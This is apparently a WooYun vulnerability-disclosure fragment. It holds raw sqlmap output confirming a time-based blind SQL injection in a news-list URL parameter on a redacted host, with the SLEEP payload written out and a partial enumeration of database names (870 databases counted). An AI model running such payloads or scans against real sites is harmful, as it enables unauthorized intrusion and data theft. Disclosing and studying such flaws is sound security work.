WooYun.org

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[09:28:01] [INFO] resuming back-end DBMS 'mysql'
[09:28:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://**.**.**.**:80/news_list/&newsCategoryId=6' AND (SELECT *
FROM (SELECT(SLEEP(10)))uciz) AND 'XWqS'='XWqS.html
---
[09:28:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[09:28:26] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
870
[09:29:39] [INFO] retrieved:
[09:30:27] [ERROR] invalid character detected. retrying..
[09:31:12] [ERROR] invalid character detected. retrying..
in
[09:33:21] [ERROR] invalid character detected. retrying..
[09:34:06] [ERROR] invalid character detected. retrying..
for
[09:37:24] [ERROR] invalid character detected. retrying..
matio
[09:41:58] [ERROR] invalid character detected. retrying..
[09:42:53] [ERROR] invalid character detected. retrying..
[09:43:48] [ERROR] invalid character detected. retrying..
n_s
[09:47:09] [ERROR] invalid character detected. retrying..
chema
[09:50:31] [INFO] retrieved: BAOAN5510
是870个库吗? 好吓人。。。不等了。。。